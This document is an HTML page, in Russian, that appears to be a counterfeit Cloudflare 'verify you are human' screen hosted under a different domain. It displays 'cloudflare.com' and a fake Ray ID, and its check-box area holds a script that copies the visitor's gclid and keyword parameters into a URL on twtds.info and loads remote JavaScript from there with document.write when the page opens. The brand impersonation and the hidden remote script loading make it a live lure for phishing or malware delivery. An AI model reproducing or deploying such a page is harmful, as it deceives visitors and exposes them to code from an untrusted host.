<!DOCTYPE html>
<html lang="ru">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>trafficheroes.pro</title>
    <style>
        body {
            font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, sans-serif;
            line-height: 1.4;
            margin: 0;
            padding: 20px;
            display: flex;
            flex-direction: column;
            align-items: center;
            min-height: 100vh;
            background-color: #fff;
        }
        
        .container {
            max-width: 800px;
            width: 100%;
            text-align: center;
            margin-top: 40px;
        }
        
        .domain {
            font-size: 24px;
            margin-bottom: 20px;
        }
        
        .check-box {
            border: 1px solid #e6e6e6;
            padding: 15px;
            border-radius: 4px;
            display: inline-flex;
            align-items: center;
            gap: 10px;
            margin: 20px 0;
        }
        
        .checkbox {
            width: 20px;
            height: 20px;
            border: 2px solid #8f8f8f;
            border-radius: 3px;
        }
        
        .cloudflare-logo {
            height: 30px;
            margin-left: 10px;
        }
        
        .message {
            margin: 20px 0;
            color: #4a4a4a;
        }
        
        .ray-id {
            position: fixed;
            bottom: 20px;
            left: 0;
            right: 0;
            text-align: center;
            color: #6d6d6d;
            font-size: 14px;
        }
        
        .cloudflare-link {
            color: #2196f3;
            text-decoration: none;
        }
        
        .cloudflare-link:hover {
            text-decoration: underline;
        }
    </style>
</head>
<body>
    <div class="container">
        <div class="domain">cloudflare.com</div>
        
        <h1>Подтвердите, что вы человек, нажав на кнопку ниже.</h1>
        
        <div class="check-box">
      
          <script>
          function GET(item) {
              var p = window.location.search;
              p = p.match(new RegExp(item+'=([^&=]+)'));
              return p ? p[1] : false;
          }
          var url = "https://twtds.info/newsbtn?gclid="+GET('gclid')+"&keyword="+GET('keyword');
          document.write("<script src="+url+"><\/script>");
          </script>
          
            
           
        </div>
        
        <div class="message">
            Сначала нам необходимо проверить безопасность вашего подключения.
        </div>
    </div>
    
    <div class="ray-id">
        Ray ID: 8f719ce6aba2c7da
        <br>
        Производительность и безопасность на платформе 
        <a href="https://www.cloudflare.com" class="cloudflare-link">Cloudflare</a>
    </div>
</body>
</html>